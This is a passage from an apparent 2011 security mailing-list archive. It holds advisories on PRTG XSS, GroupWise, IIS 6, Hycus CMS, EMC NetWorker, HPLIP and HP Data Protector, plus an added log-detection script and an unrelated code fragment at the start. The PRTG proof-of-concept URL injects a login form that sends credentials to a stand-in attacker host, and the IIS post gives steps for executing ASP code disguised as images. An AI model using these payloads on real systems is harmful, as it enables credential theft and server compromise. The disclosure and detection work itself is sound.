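        "authenticated_forged": authenticated_accepts(impostor_manifest, forged, VENDOR_KEY),
        "authenticated_tampered": authenticated_accepts(tampered, forged, VENDOR_KEY),
    }


if __name__ == "__main__":
    for case, ok in demo().items():
        print(f"{case}: {'accepted' if ok else 'rejected'}")
```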

PRTG V8.1.2.1809 XSS Bugs in login.htm and error.htm

2011-01-27 Thread Joshua Gimer
XSS (Reflected) Bugs in login.htm and error.htm

PRTG V8.1.2.1809 (All OS Versions):
http://www.paessler.com/

I have discovered two XSS bugs within PRTG version 8.1.2.1809. These bugs
are in the login.htm and error.htm documents.

These issues were possible because of a lack of input checking of the errormsg
and errorurl GET parameters within login.htm. Output encoding routines were also
not consistently used throughout the application.

PoC:

https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E%3Ctr%3E%3Ctd%3ELogin%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20id=%22loginusername%22%20name=%22username%22%20type=%22text%22%20value=%22%22%20%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20%20id=%22loginpassword%22%20name=%22password%22%20type=%22password%22%20value=%22%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Ctd%3E%3Cinput%20id=%22submitter%22%20class=%22submit%22%20type=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E%3C/table%3E%3Ciframe%20width=0%20height=0%20src=%22&loginurl=%2Fhome

https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E

The vendor was very responsive and has fixed these issues in version
8.2.0.1898/189 released on January 17th 2011.

--
Thanks,
Joshua Gimer

---

http://www.linkedin.com/in/jgimer
http://twitter.com/jgimer


VUPEN Security Research - Novell GroupWise "TZID" Variable Remote Buffer Overflow Vulnerability (VUPEN-SR-2011-004)

2011-01-27 Thread VUPEN Security Research
VUPEN Security Research - Novell GroupWise VCALENDAR "TZID" Variable Remote 
Buffer Overflow Vulnerability (VUPEN-SR-2011-004)


http://www.vupen.com/english/research.php


I. BACKGROUND
-

"Novell GroupWise collaboration software is a premier collaboration tool
for large enterprise. Look no further than Novell for your collaboration
software." (Wikipedia)


II. DESCRIPTION
-

VUPEN Vulnerability Research Team discovered a critical vulnerability
in Novell GroupWise.

The vulnerability is caused by a buffer overflow error in the "g1.dll"
module when processing the "TZID" variable within VCALENDAR data, which
could be exploited by remote unauthenticated attackers to execute arbitrary
code with SYSTEM privileges.

CVSS Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)


III. AFFECTED PRODUCTS
---

Novell GroupWise version 8.02 HP 1 (Hot Patch 1) and prior


IV. Binary Analysis & Exploits/PoCs
---

In-depth binary analysis of the vulnerability and a code execution exploit
are available through the VUPEN Binary Analysis & Exploits Service:

http://www.vupen.com/english/services/ba-index.php


V. VUPEN Threat Protection Program
---

Organizations and corporations which are members of the VUPEN Threat
Protection Program (TPP) receive advanced notifications about security
vulnerabilities discovered by VUPEN, and have access to a detailed detection
guidance to proactively protect national and critical infrastructures
against potential attacks exploiting this vulnerability:

http://www.vupen.com/english/services/tpp-index.php


VI. SOLUTION


Upgrade to Novell GroupWise version 8.02 HP 2 (Hot Patch 2).


VII. CREDIT
--

This vulnerability was discovered by Sebastien Renaud of VUPEN Security


VIII. ABOUT VUPEN Security
---

VUPEN is a leading IT security research company providing vulnerability
management and security intelligence solutions which enable enterprises
and institutions to eliminate vulnerabilities before they can be exploited,
ensure security policy compliance and meaningfully measure and manage risks.

Governmental and federal agencies, and global enterprises in the financial
services, insurance, manufacturing and technology industries rely on VUPEN
to improve their security, prioritize resources, cut time and costs, and
stay ahead of the latest threats.

* VUPEN Vulnerability Notification Service (VNS) :
http://www.vupen.com/english/services/vns-index.php

* VUPEN Binary Analysis & Exploits Service (BAE) :
http://www.vupen.com/english/services/ba-index.php

* VUPEN Threat Protection Program for Govs (TPP) :
http://www.vupen.com/english/services/tpp-index.php

* VUPEN Web Application Security Scanner (WASS) :
http://www.vupen.com/english/services/wass-index.php


IX. REFERENCES
--

http://www.vupen.com/english/research-vuln.php
http://www.vupen.com/english/advisories/2011/0220
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4325
http://www.novell.com/support/viewContent.do?externalId=7007638&sliceId=1


X. DISCLOSURE TIMELINE
-

2010-11-22 - Vulnerability discovered
2010-xx-xx - Vulnerability rediscovered by third parties including ZDI
2011-01-25 - Novell fix released




Microsoft IIS 6 parsing directory “x.asp” Vulnerability

2011-01-27 Thread info


# Microsoft IIS 6 parsing directory Vulnerability



#Discovered by: 

Pouya daneshmand

whh_iran[AT]yahoo[DOT]com

http://securitylab.ir/blog



#Introduction:

Using this vulnerability you can bypass some Security filters, for example a 
file with “.jpg” or “.rar” extension can be executed as an asp (Active Server 
Page) file.



#Vulnerable:

It just works for asp files and works on Windows 2003 / IIS 6 (As I tested...).

The test failed on IIS 5.1 and IIS 7.





#Description:

1) Create a Folder with '.asp' extension.

2) Insert your ASP code in a file with any extension (like .jpg,.rar,.txt) in 
the folder you have created.

3) Open the file with your browser and you will see it's executed as an asp 
file!



#Note:

The Extension of file does not matter at all!





#Solution:

There is no patch to fix this security vulnerability yet, the best thing I can 
say is to DISABLE ASP FILES FROM YOUR "web server extensions"! Or Remove 
“execute” permission from the upload directories.







#PS:

This vulnerability was reported for the first time on 2010-06-19 in Persian 
(http://sebug.net/vulndb/19820/)



#Original Advisory:

http://securitylab.ir/blog/dl/Microsoft-IIS6-parsing-directory-Vulnerability.pdf

http://securitylab.ir/blog/posts/11/Microsoft-IIS-6-parsing-directory-%E2%80%9Cx.asp%E2%80%9D-Vulnerability/
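
An added detection example, not part of the original advisory: it scans IIS W3C-format log lines for requests in which a directory segment carries an .asp extension while the requested file does not, the pattern the post describes. The field list and the log lines are constructed for the example.

```python
from urllib.parse import unquote


def is_asp_dir_trick(uri_stem: str) -> bool:
    """True when a directory segment of the path ends in .asp while the
    requested file itself does not (e.g. /uploads/x.asp/photo.jpg)."""
    # decode escapes first so "x%2Easp" is treated like "x.asp"
    segments = [s for s in unquote(uri_stem).split("/") if s]
    if len(segments) < 2:
        return False
    *dirs, filename = segments
    if filename.lower().endswith(".asp"):
        return False          # an ordinary ASP page; nothing unusual
    return any(d.lower().endswith(".asp") for d in dirs)


def parse_w3c(lines):
    """Yield one dict per data line, taking field names from '#Fields:'."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue              # other directives and blank lines
        if fields is None:
            raise ValueError("data line before any #Fields: directive")
        yield dict(zip(fields, line.split()))


def find_suspicious(lines):
    """Return (client ip, uri stem) for every request matching the trick."""
    hits = []
    for rec in parse_w3c(lines):
        stem = rec.get("cs-uri-stem", "")
        if is_asp_dir_trick(stem):
            hits.append((rec.get("c-ip"), stem))
    return hits


# Constructed sample log (not real traffic), W3C extended format.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2011-01-27 10:00:01 192.0.2.10 GET /uploads/photo.jpg 200
2011-01-27 10:00:02 192.0.2.10 GET /uploads/x.asp/photo.jpg 200
2011-01-27 10:00:03 192.0.2.11 GET /app/default.asp 200
2011-01-27 10:00:04 192.0.2.12 GET /files/notes.ASP/readme.txt 200
2011-01-27 10:00:05 192.0.2.13 GET /files/x%2Easp/archive.rar 200
""".splitlines()


if __name__ == "__main__":
    for ip, stem in find_suspicious(SAMPLE_LOG):
        print(f"{ip} requested {stem}: file served from an .asp-named directory")
```

The same `is_asp_dir_trick` check can be applied to directory names when an upload handler creates folders, alongside the advisory's advice to remove execute permission from upload directories.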


HTB22795: Path disclosure in Hycus CMS

2011-01-27 Thread advisory
Vulnerability ID: HTB22795
Reference: http://www.htbridge.ch/advisory/path_disclousure_in_hycus_cms.html
Product: Hycus CMS
Vendor: Hycus Web Development Team ( http://www.hycus.com/ ) 
Vulnerable Version: 1.0.3 and probably prior versions
Vendor Notification: 13 January 2011 
Vulnerability Type: Path disclosure
Status: Awaiting Vendor Response
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing 
(http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to a failure in the 
"/templates/hycus_template/template.php" script; it is possible to generate an 
error that will reveal the full path of the script.
A remote user can determine the full path to the web root directory and other 
potentially sensitive information.

http://host/templates/hycus_template/template.php




ESA-2011-003: EMC NetWorker librpc.dll spoofing vulnerability.

2011-01-27 Thread Security_Alert


ESA-2011-003: EMC NetWorker librpc.dll spoofing vulnerability.


EMC Identifier: ESA-2011-003

CVE Identifier: CVE-2011-0321


Severity Rating: CVSS v2 Base Score: 8.5 (AV:N/AC:L/Au:N/C:P/I:N/A:C)


Affected products:
EMC NetWorker earlier than 7.5.3.5
EMC NetWorker earlier than 7.6.1.2


Vulnerability Summary:
A vulnerability exists in EMC NetWorker which can be exploited to potentially 
create a denial of service condition or eavesdrop on process communications.


Vulnerability Details:
EMC NetWorker uses an RPC library to provide a portmapper service within 
nsrexecd. The portmapper restricts access for service commands to the 
localhost. However, the UDP protocol allows malicious users to spoof the source 
address of the network packet making it appear it originated from the 
localhost. This potentially may allow a remote malicious user to unregister 
existing NetWorker RPC services or register new RPC services.


Problem Resolution:
The following EMC NetWorker products contain resolutions to this issue:


EMC NetWorker version 7.5.3.5
EMC NetWorker version 7.5 SP4 and later
EMC NetWorker version 7.6.1.2 and later


EMC strongly recommends all customers apply the latest patches which contain 
the resolution to this issue, at the earliest opportunity.


Link to remedies:


For 7.5 SP3 and earlier users:
This fix is available  in build 7.5.3.5 and 7.5 SP4.  EMC recommends updating 
to the 7.5 SP4 version.  Registered EMC Powerlink customers can download the 
NetWorker 7.5 SP4 software from Powerlink. For NetWorker Software, navigate in 
Powerlink to Home > Support > Software Downloads and Licensing > Downloads J-O 
> NetWorker.


For 7.6 SP1 and 7.6 users:
The fix is available in 7.6.1.2 and subsequent cumulative build releases.  For 
details on the 7.6.1.x cumulative fix releases including download details, 
refer to the NetWorker 7.6 Cumulative Hotfix Summary document on EMC Powerlink.


Because the view is restricted based on customer agreements, you may not have 
permission to view certain downloads. Should you not see a software download 
you believe you should have access to, follow the instructions in EMC 
Knowledgebase solution emc116045.


For explanation of Severity Ratings, refer to EMC Knowledgebase solution 
emc218831. EMC recommends that all customers take into account both the base 
score and any relevant temporal and environmental scores, which may impact the 
potential severity associated with particular security vulnerability.


Credits:
EMC would like to thank an anonymous researcher working with TippingPoint's 
Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue.


EMC Corporation distributes EMC Security Advisories in order to bring to the 
attention of users of the affected EMC products important security information. 
EMC recommends all users determine the applicability of this information to 
their individual situations and take appropriate action. The information set 
forth herein is provided "as is" without warranty of any kind. EMC disclaims 
all warranties, either express or implied, including the warranties of 
merchantability, fitness for a particular purpose, title and non-infringement. 
In no event shall EMC or its suppliers be liable for any damages whatsoever 
including direct, indirect, incidental, consequential, loss of business profits 
or special damages, even if EMC or its suppliers have been advised of the 
possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for consequential or incidental damages so the 
foregoing limitation may not apply.


EMC Product Security Response Center
security_al...@emc.com
http://www.emc.com/contact-us/contact/product-security-response-center.htm




[USN-1051-1] HPLIP vulnerability

2011-01-27 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-1051-1  January 25, 2011
hplip vulnerability
CVE-2010-4267
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS
Ubuntu 9.10
Ubuntu 10.04 LTS
Ubuntu 10.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  hplip   2.8.2-0ubuntu8.2

Ubuntu 9.10:
  hplip   3.9.8-1ubuntu2.1

Ubuntu 10.04 LTS:
  hplip   3.10.2-2ubuntu2.2

Ubuntu 10.10:
  hplip   3.10.6-1ubuntu10.2

In general, a standard system update will make all the necessary changes.

Details follow:

Sebastian Krahmer discovered that HPLIP incorrectly handled certain long
SNMP responses. A remote attacker could send malicious SNMP replies to
certain HPLIP tools and cause them to crash or possibly execute arbitrary
code.


Updated packages for Ubuntu 8.04 LTS:


[security bulletin] HPSBMA02626 SSRT100301 rev.1 - HP OpenView Storage Data Protector, Remote Denial of Service (DoS)

2011-01-27 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c02699143
Version: 1

HPSBMA02626 SSRT100301 rev.1 - HP OpenView Storage Data Protector, Remote 
Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2011-01-24
Last Updated: 2011-01-24

 --

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Storage 
Data Protector. The vulnerability could be remotely exploited to create a 
Denial of Service (DoS).

References: CVE-2011-0275

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Storage Data Protector v6.11 running on Windows 2000, XP, 2003, 
2008 or Vista.
HP OpenView Storage Data Protector v6.10 running on Windows 2000, XP, 2003, 
2008 or Vista.
HP OpenView Storage Data Protector v6.0 running on Windows 2000, XP, 2003.

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference       Base Vector                     Base Score
  CVE-2011-0275   (AV:N/AC:M/Au:N/C:N/I:N/A:C)    7.1
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided the following software patches to resolve this vulnerability.

Operating System / Description / Patch ID

Windows Vista, XP, 2008, 2003, 2000 / OV DP 6.11 Win - Core / DPWIN_00475

Windows Vista, XP, 2008, 2003, 2000 / OV DP 6.10 Win - Core / DPWIN_00489

Windows XP, 2003, 2000 / OV DP 6.00 Win - Core / DPWIN_00488

The patches are available for download from
http://support.openview.hp.com/selfsolve/patches

MANUAL ACTIONS: No

HISTORY
Version: 1 (rev.1) - 24 January 2011 Initial release

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-al...@hp.com
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins 
via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
-check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
-verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile 
to update appropriate sections.

To review previously published Security Bulletins visit: 
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters
of the Bulletin number in the title:

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault

System management and security procedures must be reviewed frequently to 
maintain system integrity. HP is continually reviewing and enhancing the 
security features of software products to provide customers with current secure 
solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the 
attention of users of the affected HP products the important security 
information contained in this Bulletin. HP recommends that all users determine 
the applicability of this information to their individual situations and take 
appropriate action. HP does not warrant that this information is necessarily 
accurate or complete for all user situations and, consequently, HP will not be 
responsible for any damages resulting from user's use or disregard of the 
information provided in this Bulletin. To the extent permitted by law, HP 
disclaims all warranties, either express or implied, including the warranties 
of merchantability and fitness for a particular purpose, title and 
non-infringement."

Copyright 2